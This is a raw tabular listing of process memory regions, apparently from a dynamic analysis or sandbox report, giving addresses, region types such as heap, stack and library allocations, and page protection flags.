|
||
13EA000
|
heap
|
page read and write
|
||
16CEEF3D000
|
heap
|
page read and write
|
||
17D13E10000
|
heap
|
page read and write
|
||
26469AB6000
|
heap
|
page read and write
|
||
1FCD67DC000
|
heap
|
page read and write
|
||
22249840000
|
heap
|
page read and write
|
||
7FFD9A7C3000
|
trusted library allocation
|
page read and write
|
||
23F8AB81000
|
heap
|
page read and write
|
||
21B78F77000
|
heap
|
page read and write
|
||
1DFEFC45000
|
heap
|
page read and write
|
||
16CEEF76000
|
heap
|
page read and write
|
||
281AB67B000
|
heap
|
page read and write
|
||
281AB55C000
|
direct allocation
|
page read and write
|
||
7FFD9A7CD000
|
trusted library allocation
|
page execute and read and write
|
||
19525FFD000
|
heap
|
page read and write
|
||
281ABA90000
|
heap
|
page read and write
|
||
281ABF4F000
|
heap
|
page read and write
|
||
BE4000
|
heap
|
page read and write
|
||
246308BB000
|
trusted library allocation
|
page read and write
|
||
BD0000
|
heap
|
page read and write
|
||
1CC34E4B000
|
heap
|
page read and write
|
||
C2F0BDD000
|
stack
|
page read and write
|
||
16002900000
|
heap
|
page read and write
|
||
281AC9C6000
|
heap
|
page read and write
|
||
1FCD67E9000
|
heap
|
page read and write
|
||
7FFD9A961000
|
trusted library allocation
|
page read and write
|
||
23671384000
|
heap
|
page read and write
|
||
16CEF160000
|
trusted library allocation
|
page read and write
|
||
AB6B5DF000
|
stack
|
page read and write
|
||
16CEEE20000
|
heap
|
page read and write
|
||
281AC9EE000
|
heap
|
page read and write
|
||
174F1998000
|
heap
|
page read and write
|
||
7FFD9AB00000
|
trusted library allocation
|
page read and write
|
||
26469B37000
|
heap
|
page read and write
|
||
281A9BE0000
|
heap
|
page read and write
|
||
23BCC93E000
|
heap
|
page read and write
|
||
F9D000
|
heap
|
page read and write
|
||
16CEEF5F000
|
heap
|
page read and write
|
||
21B78F00000
|
trusted library allocation
|
page read and write
|
||
1DA81850000
|
heap
|
page read and write
|
||
26469A92000
|
heap
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
7FFD9A940000
|
trusted library allocation
|
page read and write
|
||
281AC9C6000
|
heap
|
page read and write
|
||
21B78FB4000
|
heap
|
page read and write
|
||
281ACD88000
|
heap
|
page read and write
|
||
281ABA09000
|
heap
|
page read and write
|
||
1F225215000
|
trusted library allocation
|
page read and write
|
||
2224F0FF000
|
trusted library allocation
|
page read and write
|
||
281ACD8F000
|
heap
|
page read and write
|
||
7FFD9AAF0000
|
trusted library allocation
|
page read and write
|
||
281AC9A5000
|
heap
|
page read and write
|
||
7FFD9A8F0000
|
trusted library allocation
|
page execute and read and write
|
||
2462D0DF000
|
heap
|
page read and write
|
||
1B0EE000
|
heap
|
page read and write
|
||
12A5E0A6000
|
heap
|
page read and write
|
||
21B78F5E000
|
heap
|
page read and write
|
||
2F005FE000
|
unkown
|
page readonly
|
||
174F198E000
|
heap
|
page read and write
|
||
2BCE000
|
stack
|
page read and write
|
||
7FFD9A7EC000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A984000
|
trusted library allocation
|
page read and write
|
||
23BCD028000
|
heap
|
page read and write
|
||
A977FCF000
|
stack
|
page read and write
|
||
174F1B3C000
|
heap
|
page read and write
|
||
19525FAB000
|
heap
|
page read and write
|
||
281AB6BF000
|
heap
|
page read and write
|
||
26469A92000
|
heap
|
page read and write
|
||
BA040CB000
|
stack
|
page read and write
|
||
D30317000
|
stack
|
page read and write
|
||
281AB630000
|
heap
|
page read and write
|
||
21B78EA0000
|
heap
|
page read and write
|
||
2684AF00000
|
heap
|
page read and write
|
||
281AC04F000
|
heap
|
page read and write
|
||
281AC8A0000
|
direct allocation
|
page read and write
|
||
1FCD67CF000
|
heap
|
page read and write
|
||
7FFD9A85C000
|
trusted library allocation
|
page execute and read and write
|
||
1DFEFC9A000
|
heap
|
page read and write
|
||
21B78FCB000
|
heap
|
page read and write
|
||
281ABDEC000
|
heap
|
page read and write
|
||
1C099207000
|
heap
|
page read and write
|
||
16CEEF23000
|
heap
|
page read and write
|
||
2074DB07000
|
heap
|
page read and write
|
||
281AB9CC000
|
heap
|
page read and write
|
||
12A5E0B7000
|
heap
|
page read and write
|
||
1FCD5F60000
|
heap
|
page read and write
|
||
1FCD67DC000
|
heap
|
page read and write
|
||
19525F8C000
|
heap
|
page read and write
|
||
65A9C7E000
|
stack
|
page read and write
|
||
BFA92FF000
|
stack
|
page read and write
|
||
281ABF48000
|
heap
|
page read and write
|
||
281AC8C0000
|
direct allocation
|
page read and write
|
||
16CEEF23000
|
heap
|
page read and write
|
||
281AC900000
|
direct allocation
|
page read and write
|
||
281ACA2F000
|
heap
|
page read and write
|
||
1269000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
211E2F91000
|
heap
|
page read and write
|
||
2E3F000
|
stack
|
page read and write
|
||
1B8AC2A1000
|
heap
|
page read and write
|
||
26469AAF000
|
heap
|
page read and write
|
||
2538CB20000
|
heap
|
page read and write
|
||
281AD1A0000
|
direct allocation
|
page read and write
|
||
281ABA09000
|
heap
|
page read and write
|
||
174F199E000
|
heap
|
page read and write
|
||
7FFD9A876000
|
trusted library allocation
|
page execute and read and write
|
||
2367112A000
|
heap
|
page read and write
|
||
281ACBF4000
|
heap
|
page read and write
|
||
1FCD8150000
|
heap
|
page read and write
|
||
1F224A20000
|
heap
|
page read and write
|
||
174F0EFF000
|
trusted library allocation
|
page read and write
|
||
1FCD6196000
|
heap
|
page read and write
|
||
1C098C5F000
|
heap
|
page read and write
|
||
2462E9D0000
|
trusted library allocation
|
page read and write
|
||
2224ED00000
|
trusted library allocation
|
page read and write
|
||
1C09AB94000
|
heap
|
page read and write
|
||
1F23D0A0000
|
heap
|
page read and write
|
||
7375EFF000
|
stack
|
page read and write
|
||
2F7FD7E000
|
unkown
|
page readonly
|
||
1BBFE000
|
stack
|
page read and write
|
||
ED0000
|
heap
|
page read and write
|
||
1C098BD0000
|
heap
|
page read and write
|
||
21B78F54000
|
heap
|
page read and write
|
||
281ACB37000
|
heap
|
page read and write
|
||
9E05B1C000
|
stack
|
page read and write
|
||
1C098C35000
|
heap
|
page read and write
|
||
281AC950000
|
direct allocation
|
page read and write
|
||
7FFD9A952000
|
trusted library allocation
|
page read and write
|
||
21B78F77000
|
heap
|
page read and write
|
||
7FFD9A7E0000
|
trusted library allocation
|
page read and write
|
||
FD1000
|
heap
|
page read and write
|
||
1B3F6A68000
|
heap
|
page read and write
|
||
1370000
|
heap
|
page read and write
|
||
21253450000
|
heap
|
page read and write
|
||
1DC5D090000
|
heap
|
page read and write
|
||
636B1FF000
|
stack
|
page read and write
|
||
281AC118000
|
heap
|
page read and write
|
||
70EA33C000
|
stack
|
page read and write
|
||
16CEEE80000
|
heap
|
page read and write
|
||
12FD000
|
heap
|
page read and write
|
||
2262DAF0000
|
heap
|
page read and write
|
||
17D13B90000
|
heap
|
page read and write
|
||
BA02F7F000
|
stack
|
page read and write
|
||
16CEEF7D000
|
heap
|
page read and write
|
||
2646A2AF000
|
heap
|
page read and write
|
||
281AB92A000
|
heap
|
page read and write
|
||
1DFEFBE0000
|
heap
|
page read and write
|
||
281ACB6D000
|
heap
|
page read and write
|
||
1FCD613E000
|
heap
|
page read and write
|
||
23671132000
|
heap
|
page read and write
|
||
BA0367B000
|
stack
|
page read and write
|
||
1DFF31A2000
|
direct allocation
|
page read and write
|
||
7FFD9AB0C000
|
trusted library allocation
|
page read and write
|
||
174F1A27000
|
trusted library allocation
|
page read and write
|
||
281ABE60000
|
heap
|
page read and write
|
||
2224F072000
|
trusted library allocation
|
page read and write
|
||
19522C94000
|
heap
|
page read and write
|
||
1F8B2731000
|
heap
|
page read and write
|
||
E8C8AFE000
|
stack
|
page read and write
|
||
281ACA16000
|
heap
|
page read and write
|
||
15C0000
|
trusted library allocation
|
page read and write
|
||
7FFDF8664000
|
unkown
|
page execute and read and write
|
||
2646A2B7000
|
heap
|
page read and write
|
||
23BCC925000
|
heap
|
page read and write
|
||
2224F0F4000
|
trusted library allocation
|
page read and write
|
||
281ACE42000
|
heap
|
page read and write
|
||
7FF71F138000
|
unkown
|
page readonly
|
||
1C829BF0000
|
heap
|
page read and write
|
||
21B7ADEE000
|
heap
|
page read and write
|
||
19525F71000
|
heap
|
page read and write
|
||
1D37211C000
|
heap
|
page read and write
|
||
12A5E0D9000
|
heap
|
page read and write
|
||
21253440000
|
heap
|
page read and write
|
||
2DDB4E90000
|
heap
|
page read and write
|
||
12A5E0A5000
|
heap
|
page read and write
|
||
23BCC932000
|
heap
|
page read and write
|
||
281ACB4D000
|
heap
|
page read and write
|
||
7FFD9A870000
|
trusted library allocation
|
page read and write
|
||
174F1B27000
|
heap
|
page read and write
|
||
212531D0000
|
heap
|
page read and write
|
||
195269FA000
|
heap
|
page read and write
|
||
281AC03E000
|
heap
|
page read and write
|
||
21B7ADE1000
|
heap
|
page read and write
|
||
16CEEF23000
|
heap
|
page read and write
|
||
25F377C0000
|
heap
|
page read and write
|
||
2FB0000
|
heap
|
page read and write
|
||
1BFD0620000
|
heap
|
page read and write
|
||
21B78F5A000
|
heap
|
page read and write
|
||
2646BB2E000
|
heap
|
page read and write
|
||
1FCD8160000
|
heap
|
page read and write
|
||
1D3720F0000
|
heap
|
page read and write
|
||
281ABEC3000
|
heap
|
page read and write
|
||
1EC76621000
|
heap
|
page read and write
|
||
21B794FC000
|
heap
|
page read and write
|
||
23E90770000
|
heap
|
page read and write
|
||
1F8B28E0000
|
heap
|
page read and write
|
||
17D13B70000
|
heap
|
page read and write
|
||
1C099203000
|
heap
|
page read and write
|
||
24646FEA000
|
heap
|
page read and write
|
||
16CEEF5F000
|
heap
|
page read and write
|
||
2A04CF69000
|
heap
|
page read and write
|
||
16CEEF1D000
|
heap
|
page read and write
|
||
1DA81A50000
|
heap
|
page read and write
|
||
BA03378000
|
stack
|
page read and write
|
||
26469A94000
|
heap
|
page read and write
|
||
2646A130000
|
heap
|
page read and write
|
||
281ACBED000
|
heap
|
page read and write
|
||
22216300000
|
heap
|
page read and write
|
||
281ACA0A000
|
heap
|
page read and write
|
||
281ACBF5000
|
heap
|
page read and write
|
||
1C099221000
|
heap
|
page read and write
|
||
12E48000
|
trusted library allocation
|
page read and write
|
||
281ABEF8000
|
heap
|
page read and write
|
||
281ABEDC000
|
heap
|
page read and write
|
||
1FCD6199000
|
heap
|
page read and write
|
||
1EC76700000
|
heap
|
page read and write
|
||
281AC930000
|
direct allocation
|
page read and write
|
||
174F1932000
|
heap
|
page read and write
|
||
2646A13E000
|
heap
|
page read and write
|
||
23BCD01F000
|
heap
|
page read and write
|
||
7FFD9A7B0000
|
trusted library allocation
|
page read and write
|
||
1FCD632A000
|
heap
|
page read and write
|
||
281AC39C000
|
direct allocation
|
page read and write
|
||
281ABE3C000
|
heap
|
page read and write
|
||
281AC9CE000
|
heap
|
page read and write
|
||
21B78FDE000
|
heap
|
page read and write
|
||
1F22314F000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
11FEAFC000
|
stack
|
page read and write
|
||
16CEEF00000
|
heap
|
page read and write
|
||
2DDB4EC7000
|
heap
|
page read and write
|
||
281ABEE0000
|
heap
|
page read and write
|
||
281ABF60000
|
heap
|
page read and write
|
||
264699F0000
|
heap
|
page read and write
|
||
2224A11A000
|
heap
|
page read and write
|
||
7FF71F100000
|
unkown
|
page readonly
|
||
1C09920A000
|
heap
|
page read and write
|
||
1B17E000
|
heap
|
page read and write
|
||
174F0F00000
|
trusted library allocation
|
page read and write
|
||
23BCC932000
|
heap
|
page read and write
|
||
281ABA3E000
|
heap
|
page read and write
|
||
23BCD017000
|
heap
|
page read and write
|
||
26469CF4000
|
heap
|
page read and write
|
||
1DFF3130000
|
direct allocation
|
page read and write
|
||
281ABA75000
|
heap
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
21B78F9F000
|
heap
|
page read and write
|
||
2462E9F0000
|
trusted library allocation
|
page read and write
|
||
2646A280000
|
heap
|
page read and write
|
||
1FCD614D000
|
heap
|
page read and write
|
||
19522C70000
|
heap
|
page read and write
|
||
281ACD80000
|
heap
|
page read and write
|
||
1C09AB8E000
|
heap
|
page read and write
|
||
2224F0FC000
|
trusted library allocation
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
F0D000
|
heap
|
page read and write
|
||
1F23D090000
|
heap
|
page execute and read and write
|
||
1FCD67F2000
|
heap
|
page read and write
|
||
16CEEF72000
|
heap
|
page read and write
|
||
1F8B2710000
|
heap
|
page read and write
|
||
22216330000
|
heap
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
7FFDF8667000
|
unkown
|
page execute and read and write
|
||
24647385000
|
heap
|
page read and write
|
||
21B7ADF4000
|
heap
|
page read and write
|
||
19525AA5000
|
heap
|
page read and write
|
||
281ABA23000
|
heap
|
page read and write
|
||
281ABE66000
|
heap
|
page read and write
|
||
23699F64000
|
heap
|
page read and write
|
||
1D6BD01B000
|
heap
|
page read and write
|
||
D198CF7000
|
stack
|
page read and write
|
||
23BCCB1B000
|
heap
|
page read and write
|
||
25B4F080000
|
heap
|
page read and write
|
||
281AC09B000
|
heap
|
page read and write
|
||
281AC9D1000
|
heap
|
page read and write
|
||
174F1A34000
|
trusted library allocation
|
page read and write
|
||
281ACB27000
|
heap
|
page read and write
|
||
19525FED000
|
heap
|
page read and write
|
||
281AB96D000
|
heap
|
page read and write
|
||
21B78FBF000
|
heap
|
page read and write
|
||
21547701000
|
heap
|
page read and write
|
||
22249891000
|
heap
|
page read and write
|
||
1DFEFC9C000
|
heap
|
page read and write
|
||
174F19BD000
|
heap
|
page read and write
|
||
1F8B2670000
|
heap
|
page read and write
|
||
264FC1C6000
|
heap
|
page read and write
|
||
1DFF3030000
|
direct allocation
|
page read and write
|
||
7FFDFB707000
|
unkown
|
page read and write
|
||
1FCD61A9000
|
heap
|
page read and write
|
||
1DA8188B000
|
heap
|
page read and write
|
||
23BCE996000
|
heap
|
page read and write
|
||
2224A640000
|
trusted library allocation
|
page read and write
|
||
1FCD618A000
|
heap
|
page read and write
|
||
1412F930000
|
heap
|
page read and write
|
||
2FE1000
|
trusted library allocation
|
page read and write
|
||
174F1B38000
|
heap
|
page read and write
|
||
16CEEF7D000
|
heap
|
page read and write
|
||
281ACC74000
|
heap
|
page read and write
|
||
16CEEEDD000
|
heap
|
page read and write
|
||
1280000
|
heap
|
page read and write
|
||
7FFDFB04C000
|
unkown
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
15E847F1000
|
heap
|
page read and write
|
||
7FF71F091000
|
unkown
|
page execute read
|
||
2224F06C000
|
trusted library allocation
|
page read and write
|
||
21B78ED4000
|
heap
|
page read and write
|
||
20354EC0000
|
heap
|
page read and write
|
||
19522D6B000
|
heap
|
page read and write
|
||
21B7ADE6000
|
heap
|
page read and write
|
||
2224ED12000
|
trusted library allocation
|
page read and write
|
||
1DFF2FB0000
|
direct allocation
|
page read and write
|
||
21B78F53000
|
heap
|
page read and write
|
||
174F1A3E000
|
trusted library allocation
|
page read and write
|
||
281AC920000
|
direct allocation
|
page read and write
|
||
2462D360000
|
heap
|
page read and write
|
||
6F2BAFF000
|
unkown
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
281ABF4F000
|
heap
|
page read and write
|
||
7FFD9A7A4000
|
trusted library allocation
|
page read and write
|
||
2A75F5E1000
|
heap
|
page read and write
|
||
2646A2AA000
|
heap
|
page read and write
|
||
1530000
|
heap
|
page read and write
|
||
174F1A25000
|
trusted library allocation
|
page read and write
|
||
281ABF2B000
|
heap
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
16002910000
|
heap
|
page read and write
|
||
24647279000
|
heap
|
page read and write
|
||
7FFD9AB10000
|
trusted library allocation
|
page read and write
|
||
281ACD3E000
|
heap
|
page read and write
|
||
1C098C61000
|
heap
|
page read and write
|
||
264FC1ED000
|
heap
|
page read and write
|
||
281AC8E0000
|
direct allocation
|
page read and write
|
||
B0EABFF000
|
stack
|
page read and write
|
||
2462D396000
|
heap
|
page read and write
|
||
71C000
|
heap
|
page read and write
|
||
1412F6F0000
|
heap
|
page read and write
|
||
281AC03E000
|
heap
|
page read and write
|
||
1E835A31000
|
heap
|
page read and write
|
||
16CEEF46000
|
heap
|
page read and write
|
||
1AB4D000
|
stack
|
page read and write
|
||
281AC09E000
|
heap
|
page read and write
|
||
1306000
|
heap
|
page read and write
|
||
281ACFCB000
|
heap
|
page read and write
|
||
23699F53000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
174F199C000
|
heap
|
page read and write
|
||
12A5E0DE000
|
heap
|
page read and write
|
||
16CEEEDD000
|
heap
|
page read and write
|
||
147F000
|
stack
|
page read and write
|
||
1C829BF5000
|
heap
|
page read and write
|
||
1C09AB70000
|
heap
|
page read and write
|
||
7FFDF865F000
|
unkown
|
page execute and read and write
|
||
281ABF20000
|
heap
|
page read and write
|
||
16CEEF63000
|
heap
|
page read and write
|
||
7FFD9ABB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9AAF9000
|
trusted library allocation
|
page read and write
|
||
F97000
|
heap
|
page read and write
|
||
281AC9E4000
|
heap
|
page read and write
|
||
281ACB6F000
|
heap
|
page read and write
|
||
7FFD9A850000
|
trusted library allocation
|
page read and write
|
||
7FFDFF247000
|
unkown
|
page execute and read and write
|
||
23BCD031000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
7FFD9A951000
|
trusted library allocation
|
page read and write
|
||
1FCD67CC000
|
heap
|
page read and write
|
||
70EA179000
|
stack
|
page read and write
|
||
12A5E0D0000
|
heap
|
page read and write
|
||
1412F720000
|
heap
|
page read and write
|
||
5CA4FFF000
|
stack
|
page read and write
|
||
7FFD9A7D3000
|
trusted library allocation
|
page execute and read and write
|
||
2462D3A4000
|
heap
|
page read and write
|
||
21B78DC0000
|
heap
|
page read and write
|
||
7FF644870000
|
unkown
|
page readonly
|
||
C5C9A7E000
|
stack
|
page read and write
|
||
1E880020000
|
heap
|
page read and write
|
||
7FF6448B4000
|
unkown
|
page readonly
|
||
281AC0AE000
|
heap
|
page read and write
|
||
1E835A31000
|
heap
|
page read and write
|
||
1E835A31000
|
heap
|
page read and write
|
||
6E51E7F000
|
stack
|
page read and write
|
||
246308B6000
|
trusted library allocation
|
page read and write
|
||
7FFD9AA10000
|
trusted library allocation
|
page read and write
|
||
1230000
|
trusted library allocation
|
page read and write
|
||
1C099242000
|
heap
|
page read and write
|
||
7C5000
|
heap
|
page read and write
|
||
A1CDBCC000
|
stack
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
7FF6448AE000
|
unkown
|
page read and write
|
||
19522CEF000
|
heap
|
page read and write
|
||
23BCD007000
|
heap
|
page read and write
|
||
174F0F01000
|
trusted library allocation
|
page read and write
|
||
1C099242000
|
heap
|
page read and write
|
||
281AC534000
|
direct allocation
|
page read and write
|
||
174F1996000
|
heap
|
page read and write
|
||
281AC08B000
|
heap
|
page read and write
|
||
281ABF08000
|
heap
|
page read and write
|
||
5CA4EFF000
|
unkown
|
page read and write
|
||
1B8AC280000
|
heap
|
page read and write
|
||
1C098C26000
|
heap
|
page read and write
|
||
1FCD618E000
|
heap
|
page read and write
|
||
1320000
|
trusted library allocation
|
page read and write
|
||
7FFDFB64B000
|
unkown
|
page execute and read and write
|
||
7FFD9AA80000
|
trusted library allocation
|
page read and write
|
||
19522C99000
|
heap
|
page read and write
|
||
25B4F16B000
|
heap
|
page read and write
|
||
281AC09A000
|
heap
|
page read and write
|
||
25F3780E000
|
heap
|
page read and write
|
||
16CEEF26000
|
heap
|
page read and write
|
||
281ABA75000
|
heap
|
page read and write
|
||
65A99A7000
|
stack
|
page read and write
|
||
16CEEEA7000
|
heap
|
page read and write
|
||
281ACBC3000
|
heap
|
page read and write
|
||
2646A295000
|
heap
|
page read and write
|
||
1E835950000
|
heap
|
page read and write
|
||
19522D1F000
|
heap
|
page read and write
|
||
11EE000
|
stack
|
page read and write
|
||
1BAE0000
|
heap
|
page read and write
|
||
281ABA3E000
|
heap
|
page read and write
|
||
281ACBED000
|
heap
|
page read and write
|
||
2462EA10000
|
heap
|
page execute and read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
11FEBFF000
|
unkown
|
page read and write
|
||
281AC11C000
|
heap
|
page read and write
|
||
7FFD9A7F0000
|
trusted library allocation
|
page read and write
|
||
281AC07C000
|
heap
|
page read and write
|
||
281AC9CC000
|
heap
|
page read and write
|
||
6F2B74C000
|
stack
|
page read and write
|
||
19522D5F000
|
heap
|
page read and write
|
||
BA033FA000
|
stack
|
page read and write
|
||
7FFD9A876000
|
trusted library allocation
|
page execute and read and write
|
||
264FC1C5000
|
heap
|
page read and write
|
||
1375000
|
heap
|
page read and write
|
||
116F000
|
heap
|
page read and write
|
||
2463EA91000
|
trusted library allocation
|
page read and write
|
||
136D000
|
heap
|
page read and write
|
||
16CEEECD000
|
heap
|
page read and write
|
||
1FCD632A000
|
heap
|
page read and write
|
||
A7ED67000
|
stack
|
page read and write
|
||
10CF000
|
stack
|
page read and write
|
||
1BCFE000
|
stack
|
page read and write
|
||
12A5E0B9000
|
heap
|
page read and write
|
||
B10000
|
trusted library allocation
|
page read and write
|
||
281AC998000
|
heap
|
page read and write
|
||
2A1302C2000
|
heap
|
page read and write
|
||
2155A770000
|
heap
|
page read and write
|
||
2074DD70000
|
heap
|
page read and write
|
||
2F004FB000
|
stack
|
page read and write
|
||
222498AB000
|
heap
|
page read and write
|
||
174F1B2E000
|
heap
|
page read and write
|
||
1FCD6147000
|
heap
|
page read and write
|
||
1FCD6138000
|
heap
|
page read and write
|
||
1F2230D6000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
7FFD9A86C000
|
trusted library allocation
|
page execute and read and write
|
||
281AC10E000
|
heap
|
page read and write
|
||
281AC07C000
|
heap
|
page read and write
|
||
D3077E000
|
stack
|
page read and write
|
||
16CEEF16000
|
heap
|
page read and write
|
||
EC460FF000
|
unkown
|
page read and write
|
||
1DFEFC33000
|
heap
|
page read and write
|
||
1C098C36000
|
heap
|
page read and write
|
||
174F0F20000
|
heap
|
page read and write
|
||
9E4000
|
heap
|
page read and write
|
||
23BCC905000
|
heap
|
page read and write
|
||
23671103000
|
heap
|
page read and write
|
||
BA034FF000
|
stack
|
page read and write
|
||
22249929000
|
heap
|
page read and write
|
||
2224EF02000
|
heap
|
page read and write
|
||
1FCD6327000
|
heap
|
page read and write
|
||
23E90A24000
|
heap
|
page read and write
|
||
C2F403F000
|
stack
|
page read and write
|
||
7D0000
|
heap
|
page read and write
|
||
281AC118000
|
heap
|
page read and write
|
||
281ABE5F000
|
heap
|
page read and write
|
||
7FFE0EC41000
|
unkown
|
page execute and read and write
|
||
1B8AC200000
|
heap
|
page read and write
|
||
264FC1ED000
|
heap
|
page read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
E82B8FF000
|
stack
|
page read and write
|
||
FE7511B000
|
stack
|
page read and write
|
||
281ABA73000
|
heap
|
page read and write
|
||
23BCC91E000
|
heap
|
page read and write
|
||
174F0F10000
|
heap
|
page readonly
|
||
281ACA01000
|
heap
|
page read and write
|
||
281AB9E1000
|
heap
|
page read and write
|
||
7FFD9A9D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A8A6000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A9B0000
|
trusted library allocation
|
page read and write
|
||
7FF71F12E000
|
unkown
|
page read and write
|
||
2224F015000
|
trusted library allocation
|
page read and write
|
||
281ABF24000
|
heap
|
page read and write
|
||
2646A13E000
|
heap
|
page read and write
|
||
1F224F0C000
|
trusted library allocation
|
page read and write
|
||
281AC092000
|
heap
|
page read and write
|
||
2FEF000
|
trusted library allocation
|
page read and write
|
||
16CEEF7D000
|
heap
|
page read and write
|
||
15E849F0000
|
heap
|
page read and write
|
||
23671138000
|
heap
|
page read and write
|
||
7FFD9A7ED000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A9A0000
|
trusted library allocation
|
page execute and read and write
|
||
281ABF04000
|
heap
|
page read and write
|
||
2262D950000
|
heap
|
page read and write
|
||
7FF64489B000
|
unkown
|
page readonly
|
||
7FFD9A7DD000
|
trusted library allocation
|
page execute and read and write
|
||
19524FC1000
|
heap
|
page read and write
|
||
1CC34E61000
|
heap
|
page read and write
|
||
23BCD00C000
|
heap
|
page read and write
|
||
281AC9CC000
|
heap
|
page read and write
|
||
7FFE14631000
|
unkown
|
page execute and read and write
|
||
24B0000
|
heap
|
page read and write
|
||
F01000
|
heap
|
page read and write
|
||
1DB98000
|
heap
|
page read and write
|
||
70E9F7C000
|
stack
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
1300000
|
heap
|
page read and write
|
||
2646A288000
|
heap
|
page read and write
|
||
174F1A80000
|
trusted library allocation
|
page execute
|
||
177E000
|
stack
|
page read and write
|
||
1476000
|
heap
|
page read and write
|
||
A1CDFFF000
|
stack
|
page read and write
|
||
281AC518000
|
direct allocation
|
page read and write
|
||
281ACED2000
|
heap
|
page read and write
|
||
174F194A000
|
heap
|
page read and write
|
||
160026E1000
|
heap
|
page read and write
|
||
1FCD6184000
|
heap
|
page read and write
|
||
1C098C61000
|
heap
|
page read and write
|
||
766517E000
|
stack
|
page read and write
|
||
21253210000
|
heap
|
page read and write
|
||
264FC1EE000
|
heap
|
page read and write
|
||
281AB60B000
|
heap
|
page read and write
|
||
23671380000
|
heap
|
page read and write
|
||
2646A287000
|
heap
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
21B79509000
|
heap
|
page read and write
|
||
281AC0A4000
|
heap
|
page read and write
|
||
7FFD9A7AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A860000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9A850000
|
trusted library allocation
|
page execute and read and write
|
||
1DFF2F90000
|
direct allocation
|
page read and write
|
||
BA02E73000
|
stack
|
page read and write
|
||
281AC9BC000
|
heap
|
page read and write
|
||
1C098C44000
|
heap
|
page read and write
|
||
1CA952C2000
|
heap
|
page read and write
|
||
281AB644000
|
heap
|
page read and write
|
||
1F23D0AE000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
1DC5D148000
|
heap
|
page read and write
|
||
6E51B59000
|
stack
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
23BCD031000
|
heap
|
page read and write
|
||
174F1941000
|
heap
|
page read and write
|
||
1DFEFC27000
|
heap
|
page read and write
|
||
1C098C6D000
|
heap
|
page read and write
|
||
1B72E000
|
stack
|
page read and write
|
||
281AC980000
|
direct allocation
|
page read and write
|
||
195246D0000
|
heap
|
page read and write
|
||
1D6BCF74000
|
heap
|
page read and write
|
||
281ABE6E000
|
heap
|
page read and write
|
||
1FCD61A3000
|
heap
|
page read and write
|
||
174F1B2B000
|
heap
|
page read and write
|
||
7FFDF8602000
|
unkown
|
page execute and read and write
|
||
EE0000
|
heap
|
page read and write
|
||
1FCD6167000
|
heap
|
page read and write
|
||
131B8000
|
trusted library allocation
|
page read and write
|
||
16CEF1AC000
|
heap
|
page read and write
|
||
23BCC8F5000
|
heap
|
page read and write
|
||
1C098C02000
|
heap
|
page read and write
|
||
281ACA2F000
|
heap
|
page read and write
|
||
7FFDFF212000
|
unkown
|
page execute and read and write
|
||
C2F11BE000
|
stack
|
page read and write
|
||
21B78FC6000
|
heap
|
page read and write
|
||
174F199E000
|
heap
|
page read and write
|
||
281ACB2A000
|
heap
|
page read and write
|
||
2462EB17000
|
trusted library allocation
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
2646BB21000
|
heap
|
page read and write
|
||
281AC098000
|
heap
|
page read and write
|
||
1BA70000
|
heap
|
page read and write
|
||
19525FBD000
|
heap
|
page read and write
|
||
174F1941000
|
heap
|
page read and write
|
||
1C09AB94000
|
heap
|
page read and write
|
||
2DDB4EB5000
|
heap
|
page read and write
|
||
24646AC0000
|
trusted library allocation
|
page read and write
|
||
390000
|
heap
|
page read and write
|
||
281AC04F000
|
heap
|
page read and write
|
||
1C098C58000
|
heap
|
page read and write
|
||
281AC99E000
|
heap
|
page read and write
|
||
281AC0A4000
|
heap
|
page read and write
|
||
23BCD014000
|
heap
|
page read and write
|
||
7FFDFF190000
|
unkown
|
page readonly
|
||
16CF0B00000
|
heap
|
page read and write
|
||
281ACD86000
|
heap
|
page read and write
|
||
281ABA6D000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
281ABE55000
|
heap
|
page read and write
|
||
2C408FB000
|
stack
|
page read and write
|
||
1D373B05000
|
heap
|
page read and write
|
||
2646A13B000
|
heap
|
page read and write
|
||
1FCD6185000
|
heap
|
page read and write
|
||
1EC7660B000
|
heap
|
page read and write
|
||
2462F7D1000
|
trusted library allocation
|
page read and write
|
||
12A5E0DE000
|
heap
|
page read and write
|
||
25F3780B000
|
heap
|
page read and write
|
||
16CEEF38000
|
heap
|
page read and write
|
||
281AC039000
|
heap
|
page read and write
|
||
22216368000
|
heap
|
page read and write
|
||
281AB922000
|
heap
|
page read and write
|
||
7FFD9AC00000
|
trusted library allocation
|
page read and write
|
||
1EC76621000
|
heap
|
page read and write
|
||
12A5E0D9000
|
heap
|
page read and write
|
||
7FFD9A7A2000
|
trusted library allocation
|
page read and write
|
||
281AC098000
|
heap
|
page read and write
|
||
281ABF21000
|
heap
|
page read and write
|
||
281AC0AE000
|
heap
|
page read and write
|
||
1249000
|
heap
|
page read and write
|
||
2F0000
|
unkown
|
page readonly
|
||
281ABF76000
|
heap
|
page read and write
|
||
23BCC8FF000
